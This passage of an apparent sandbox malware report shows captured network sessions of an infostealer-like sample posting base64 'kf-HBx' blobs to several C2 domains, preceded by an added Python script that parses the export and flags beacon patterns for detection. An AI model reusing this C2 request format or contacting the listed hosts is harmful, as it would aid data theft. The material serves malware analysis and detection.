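The sessions above share one shape: every request goes to a short directory path on the contacted host (/rhgo/, /jp2s/), carries a single form parameter named kf-HBx whose value looks like base64, uses the same fixed MSIE 8.0 user agent, and is answered with a 404. As an added example for this page (not Joe Sandbox code and not code recovered from the sample), the Python below parses a message in the report's raw export form, in which timestamp, byte count and direction are run together on one line (e.g. "CEST787OUTPOST /rhgo/ HTTP/1.1"), decodes the "Data Raw" hex back to bytes, and computes those indicators. The two sample messages are constructed from the first POST and the session 16 GET to www.vasehub.xyz above, with the POST body cut to a 33-byte prefix and headers trimmed; the indicator names, the base64 and path heuristics and the beacon-candidate rule are this example's own choices, not a vendor or FormBook signature.

```python
"""Parse HTTP messages from a sandbox report's raw session export and score the beacon pattern.

Added example for this page; not Joe Sandbox code and not code from the analysed sample.
Assumes the export's one-line first line (timestamp + byte count + OUT/IN + request line),
one header per line, and optional "Data Raw:" / "Data Ascii:" lines. Indicator names and
thresholds are this example's own choices, not a vendor signature.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Constructed sample: the first POST to www.vasehub.xyz above, body cut to a 33-byte
# prefix (Content-Length adjusted to match). 787 is the report's own byte count, kept as-is.
SAMPLE_POST = """Oct 24, 2024 08:02:41.300297022 CEST787OUTPOST /rhgo/ HTTP/1.1
Host: www.vasehub.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Origin: http://www.vasehub.xyz
Referer: http://www.vasehub.xyz/rhgo/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Data Raw: 6b 66 2d 48 42 78 3d 34 7a 59 51 63 6b 69 72 4f 4d 62 4f 55 71 62 48 6f 39 44 69 38 50 61 4b 3d 3d
Data Ascii: kf-HBx=4zYQckirOMbOUqbHo9Di8PaK=="""

# Constructed sample: the GET from session 16 above, headers trimmed to those used here.
SAMPLE_GET = """Oct 24, 2024 08:02:49.668462038 CEST520OUTGET /rhgo/?kf-HBx=1xwwfRv/EtrSMau8qPeCsOf3wKLyTBnoq21AcW2zPWj0G3ZAwmXkdhytTHgnTqC6RVKy1Kv2PAT+a+qucbh6tBLzZBRYsir7YQhsB0BKwkYVMNCqueBTujA=&oFA=_z5x9B5 HTTP/1.1
Host: www.vasehub.xyz
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)"""

# "Oct 24, 2024 08:02:41.300297022 CEST" + "787" + "OUT" + "POST /rhgo/ HTTP/1.1", no separators.
FIRST_LINE = re.compile(r"^(?P<ts>.+?\s[A-Z]{3,5})(?P<nbytes>\d+)(?P<direction>OUT|IN)(?P<line>.+)$")
B64ISH = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")      # heuristic: base64 alphabet, optional padding
SHORT_DIR = re.compile(r"^/[A-Za-z0-9]{2,8}/$")          # heuristic: one short segment, e.g. /rhgo/ or /jp2s/


@dataclass
class HttpMessage:
    timestamp: str
    nbytes: int
    direction: str
    start_line: str
    headers: dict = field(default_factory=dict)
    body: bytes = b""


def decode_data_raw(hexdump: str) -> bytes:
    """Turn a 'Data Raw' hex dump back into bytes; a trailing [TRUNCATED] marker is dropped."""
    return bytes.fromhex(hexdump.replace("[TRUNCATED]", "").strip())


def split_form(encoded: str) -> list:
    """Split a=b&c=d on '&' and the first '=' only, without unquoting, so a '+' inside the
    base64-looking value is preserved (urllib's parse_qsl would turn it into a space)."""
    pairs = []
    for item in encoded.split("&"):
        if item:
            name, _, value = item.partition("=")
            pairs.append((name, value))
    return pairs


def parse_message(text: str) -> HttpMessage:
    """Parse one request or response block; the hex dump is authoritative for the body."""
    lines = text.strip().splitlines()
    m = FIRST_LINE.match(lines[0])
    if not m:
        raise ValueError("unrecognised first line: %r" % lines[0][:60])
    msg = HttpMessage(m["ts"], int(m["nbytes"]), m["direction"], m["line"])
    for line in lines[1:]:
        if line.startswith("Data Raw:"):
            msg.body = decode_data_raw(line[len("Data Raw:"):])
        elif line.startswith("Data Ascii:"):
            continue  # printable rendering of the same bytes
        elif ": " in line:
            name, value = line.split(": ", 1)
            msg.headers[name.lower()] = value
    return msg


def beacon_indicators(msg: HttpMessage) -> dict:
    """Indicators of the beaconing shape seen in the report's sessions (outbound requests only)."""
    if msg.direction != "OUT":
        raise ValueError("indicators are computed on outbound requests only")
    method, target, _version = msg.start_line.split(" ", 2)
    parts = urlsplit(target)
    host = msg.headers.get("host", "")
    # POST carries the blob in the form body, GET carries the same parameter in the query string.
    encoded = msg.body.decode("latin-1") if method == "POST" else parts.query
    params = split_form(encoded)
    declared = msg.headers.get("content-length")
    return {
        "method": method,
        "host": host,
        "path": parts.path,
        "param_names": [name for name, _ in params],
        "payload_b64_like": bool(params) and bool(B64ISH.match(params[0][1])),
        "legacy_ua": "MSIE 8.0" in msg.headers.get("user-agent", ""),
        "referer_is_self": msg.headers.get("referer") == "http://%s%s" % (host, parts.path),
        "short_dir_path": bool(SHORT_DIR.match(parts.path)),
        "length_matches": declared is None or int(declared) == len(msg.body),
    }


def is_beacon_candidate(ind: dict) -> bool:
    """This example's rule: fixed legacy UA + base64-looking payload + short directory path."""
    return ind["legacy_ua"] and ind["payload_b64_like"] and ind["short_dir_path"]


if __name__ == "__main__":
    for sample in (SAMPLE_POST, SAMPLE_GET):
        ind = beacon_indicators(parse_message(sample))
        print(ind["method"], ind["host"], ind["path"], ind["param_names"], is_beacon_candidate(ind))
```

Run over a whole export, the hosts and paths it returns are the candidate C2 list for the run (www.vasehub.xyz and www.coffee-and-blends.info in the sessions shown); the 404 replies do not lower the score, since a request that carries data to the server is the indicator, not the server's answer.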

Session ID 17 | Source 192.168.2.4:50024 | Destination 217.160.0.231:80 | PID 1376 | Process C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp: Oct 24, 2024 08:02:55.446274996 CEST | Bytes transferred: 820 | Direction: OUT
POST /jp2s/ HTTP/1.1
Host: www.coffee-and-blends.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.coffee-and-blends.info
Referer: http://www.coffee-and-blends.info/jp2s/
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 43 32 43 6d 34 6d 76 46 79 67 58 34 75 68 50 45 35 34 44 72 2f 73 66 6b 78 55 4c 56 35 63 6b 51 66 79 64 47 66 75 6f 73 77 78 47 6a 4f 33 77 66 62 65 64 70 46 53 6f 69 39 73 49 48 4a 2f 4c 35 4c 7a 63 4d 4e 36 68 6e 38 58 6b 6c 59 79 63 74 64 38 2f 37 7a 38 73 61 4b 34 44 47 49 66 38 2b 67 4f 54 4c 32 31 57 74 6c 6c 55 68 79 78 42 4b 52 78 39 4b 49 53 38 36 48 70 31 4d 6b 76 44 46 73 4d 54 48 38 44 43 45 41 6d 35 6d 74 39 66 4d 49 50 64 44 37 48 4e 44 6c 55 30 75 58 36 79 42 4d 74 7a 6e 54 4c 7a 44 70 52 6c 41 56 55 63 7a 36 58 72 35 6a 79 53 4b 4b 38 4b 54 5a 43 45 6c 35 51 3d 3d
                                                                                                                                  Data Ascii: kf-HBx=C2Cm4mvFygX4uhPE54Dr/sfkxULV5ckQfydGfuoswxGjO3wfbedpFSoi9sIHJ/L5LzcMN6hn8XklYyctd8/7z8saK4DGIf8+gOTL21WtllUhyxBKRx9KIS86Hp1MkvDFsMTH8DCEAm5mt9fMIPdD7HNDlU0uX6yBMtznTLzDpRlAVUcz6Xr5jySKK8KTZCEl5Q==
Timestamp: Oct 24, 2024 08:02:56.273010015 CEST | Bytes transferred: 779 | Direction: IN
HTTP/1.1 404 Not Found
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Date: Thu, 24 Oct 2024 06:02:56 GMT
Server: Apache
X-Frame-Options: deny
Content-Encoding: gzip
                                                                                                                                  Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                                                                                                                  Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


Session ID 18 | Source 192.168.2.4:50025 | Destination 217.160.0.231:80 | PID 1376 | Process C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp: Oct 24, 2024 08:02:57.987793922 CEST | Bytes transferred: 840 | Direction: OUT
POST /jp2s/ HTTP/1.1
Host: www.coffee-and-blends.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.coffee-and-blends.info
Referer: http://www.coffee-and-blends.info/jp2s/
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Data Ascii: kf-HBx=C2Cm4mvFygX48R/Eprrrocfj0ULV38l4fyZGfrI8wDyjPWAfV/dpJyoilcJPUPLnLzAuN7Nn8XwlYzstaN/4wMscM4DEVv8+gOTL21CHlmkhyFFKQTVJTy87OJ1MvPDJsMSS8Ga+Akxmt/XMJedAxHNF6E1bRPfwONmxQLv2oSYmZyNprmKuxy25X7DnUB5sibYfECWBWPsAN+MOWTyqKwk=
Oct 24, 2024 08:02:58.821497917 CEST | 779 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Date: Thu, 24 Oct 2024 06:02:58 GMT
Server: Apache
X-Frame-Options: deny
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 50026 | 217.160.0.231 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:03:00.537065983 CEST | 10922 | OUT | POST /jp2s/ HTTP/1.1
Host: www.coffee-and-blends.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.coffee-and-blends.info
Referer: http://www.coffee-and-blends.info/jp2s/
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 10303
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Oct 24, 2024 08:03:01.385833025 CEST | 779 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Date: Thu, 24 Oct 2024 06:03:01 GMT
Server: Apache
X-Frame-Options: deny
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 50027 | 217.160.0.231 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:03:03.236032009 CEST | 531 | OUT | GET /jp2s/?oFA=_z5x9B5&kf-HBx=P0qG7QiazDWD2BWelIei5OaE3G7F+t1+aX9fXKMK+x60PE0IVfUJFQ907pREBNW8LmwaLsR1/kIgdQ4HVuT4wdAdC4fEO7kU/4v+0UaEqAZT5BgARj9CDCY= HTTP/1.1
Host: www.coffee-and-blends.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Oct 24, 2024 08:03:04.071456909 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 1271
Connection: close
Date: Thu, 24 Oct 2024 06:03:03 GMT
Server: Apache
X-Frame-Options: deny
Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
Oct 24, 2024 08:03:04.071521044 CEST | 203 | IN | Data Raw: 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 44 45 27 0a
Data Ascii: + window.location.host + '/' + 'IONOSParkingDE' + '/park.js">' + '<\/script>' ); </script> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 50028 | 54.179.173.60 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:03:09.837869883 CEST | 793 | OUT | POST /qmcg/ HTTP/1.1
Host: www.tmstore.click
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.tmstore.click
Referer: http://www.tmstore.click/qmcg/
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Data Ascii: kf-HBx=35ggt26dJQJxW7c6hXW4atBj5OuRuwViSe/R7tnDyx29FoerJ5NW7sYi8Ot2uDKQUc3ZhtAKSVLtK4S+cfQFv+6XFoMjHyP71Tr42Ub+OdmyEHfimLijQ3xqNVaht7XiooT2gQMTOnZtJt3ErjasF8EX2TdhvTOOXGEsrrX4MbErt6rhKoLVzuSpm/GJphXHrg==
Oct 24, 2024 08:03:10.833158016 CEST | 364 | IN | HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Thu, 24 Oct 2024 06:03:10 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Location: https://www.tmstore.click/qmcg/
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 50029 | 54.179.173.60 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:03:12.380589962 CEST | 813 | OUT | POST /qmcg/ HTTP/1.1
Host: www.tmstore.click
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.tmstore.click
Referer: http://www.tmstore.click/qmcg/
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Data Ascii: kf-HBx=35ggt26dJQJxXas6j0+4bNBiyuuRkQUrSZ3R7oeEzCe9EIurI9hW4sYiuut5jjKLUc66htMKSVvtK9u+coMavu6RKIMbYiP71Tr42UPYOZKyE2vimvOiZXx1d1ahnbXmooTfgRB0OlhtJsHEs26vK8Ed6DcsuyueSV0hp7LJOLVOlc67bZqChu2a74P9kiqOwvSQrrvpGtGQDg5khL8vZEQ=
Oct 24, 2024 08:03:13.393605947 CEST | 364 | IN | HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Thu, 24 Oct 2024 06:03:13 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Location: https://www.tmstore.click/qmcg/
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 50030 | 54.179.173.60 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:03:15.692692995 CEST | 10895 | OUT | POST /qmcg/ HTTP/1.1
Host: www.tmstore.click
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.tmstore.click
Referer: http://www.tmstore.click/qmcg/
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 10303
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 33 35 67 67 74 32 36 64 4a 51 4a 78 58 61 73 36 6a 30 2b 34 62 4e 42 69 79 75 75 52 6b 51 55 72 53 5a 33 52 37 6f 65 45 7a 45 47 39 46 37 6d 72 48 38 68 57 35 73 59 69 31 75 74 36 6a 6a 4c 52 55 64 53 6d 68 74 52 33 53 54 72 74 4c 62 36 2b 4e 36 6b 61 6b 75 36 52 53 49 4d 67 48 79 50 79 31 54 37 30 32 55 66 59 4f 5a 4b 79 45 30 6e 69 76 62 69 69 66 58 78 71 4e 56 61 74 74 37 58 4f 6f 73 2f 6c 67 52 45 44 62 46 42 74 4a 4d 58 45 70 43 61 76 56 4d 45 62 35 44 64 2f 75 79 6a 5a 53 56 35 51 70 34 58 76 4f 4a 4a 4f 67 4a 4c 5a 65 4c 43 56 6a 6f 69 33 6c 49 72 4d 72 42 65 4b 39 4e 43 4b 6c 65 76 52 63 34 6d 51 48 52 45 75 7a 72 41 50 64 41 52 2f 44 48 48 59 67 4d 2b 53 35 6d 68 6c 47 49 66 38 55 36 31 52 4e 69 76 4b 6c 6c 32 67 70 38 50 79 4c 65 42 54 38 68 38 47 5a 32 34 69 75 63 45 72 6a 31 35 57 6f 74 62 61 43 41 43 67 34 47 70 48 75 53 48 32 52 49 2b 77 44 70 68 36 6c 47 44 6f 75 75 70 51 61 6a 64 4b 68 66 47 66 47 5a 34 4a 66 48 47 68 42 48 54 78 6d 32 59 44 69 43 78 44 66 33 77 [TRUNCATED]
                                                                                                                                  Data Ascii: kf-HBx=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 [TRUNCATED]
                                                                                                                                  Oct 24, 2024 08:03:16.687108040 CEST364INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 24 Oct 2024 06:03:16 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 166
                                                                                                                                  Connection: close
                                                                                                                                  Location: https://www.tmstore.click/qmcg/
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 50031 | 54.179.173.60 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe

Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:03:18.232958078 CEST | 522 | OUT | GET /qmcg/?kf-HBx=67IAuCDTBw5QZph7iUnsNNZg0vqYuCAKYaPJ7pOH3jPtJouGJ8FP+NUi0Lg8hSiTUrSIuLh0DGPLGIiCUYAvzJi3IqMGAEHDzAW40nPzBt7ZJ3Wrnor3ezI=&oFA=_z5x9B5 HTTP/1.1
    Host: www.tmstore.click
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Oct 24, 2024 08:03:19.222012043 CEST | 504 | IN | HTTP/1.1 301 Moved Permanently
    Server: openresty
    Date: Thu, 24 Oct 2024 06:03:19 GMT
    Content-Type: text/html
    Content-Length: 166
    Connection: close
    Location: https://www.tmstore.click/qmcg/?kf-HBx=67IAuCDTBw5QZph7iUnsNNZg0vqYuCAKYaPJ7pOH3jPtJouGJ8FP+NUi0Lg8hSiTUrSIuLh0DGPLGIiCUYAvzJi3IqMGAEHDzAW40nPzBt7ZJ3Wrnor3ezI=&oFA=_z5x9B5
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 50032 | 3.33.130.190 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe

Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:03:24.486469030 CEST | 799 | OUT | POST /xia9/ HTTP/1.1
    Host: www.softillery.info
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate, br
    Origin: http://www.softillery.info
    Referer: http://www.softillery.info/xia9/
    Connection: close
    Cache-Control: max-age=0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 203
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
    Data Ascii: kf-HBx=3HzJ1oP0xOMJRIcrU0E+kvYaKuggLcT4zRPS+qnGSpWheTFMi8KOkHo/WRaCNkpYVVdeyBjhxXA3shTsUjKlWBy8JknrxZ0SObXXs3zV0f+ceol0Ohbzrr/+6/qt5JeuhjOsnj4vq7Wi2MpcL6FEfI+jMVsFuu4G97flCTMz76PLCWs7actbaNvJVxEkzxG/bg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 50033 | 3.33.130.190 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe

Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:03:27.035609007 CEST | 819 | OUT | POST /xia9/ HTTP/1.1
    Host: www.softillery.info
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate, br
    Origin: http://www.softillery.info
    Referer: http://www.softillery.info/xia9/
    Connection: close
    Cache-Control: max-age=0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 223
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
    Data Ascii: kf-HBx=3HzJ1oP0xOMJSrErSVE+hPYbBOggA8T8zQzS+oKBS/Ohfy1Mj5+O33o/YxaHJkpHVVhgyEDhxWg3slXsUQiqXRy+CEnt+50SObXXszf70fmcdYV0PEulmL/xqfqtuZeqhjOenilnq+Si2OxcP/pFWI+hC1tt/PEIkJa9AQss0LD3Kw9hLtMMINL6I2NQ+y72Api4BROPbt+AE0Cu/r78gck=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 50034 | 3.33.130.190 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe

Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:03:30.577044010 CEST | 10901 | OUT | POST /xia9/ HTTP/1.1
    Host: www.softillery.info
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate, br
    Origin: http://www.softillery.info
    Referer: http://www.softillery.info/xia9/
    Connection: close
    Cache-Control: max-age=0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 10303
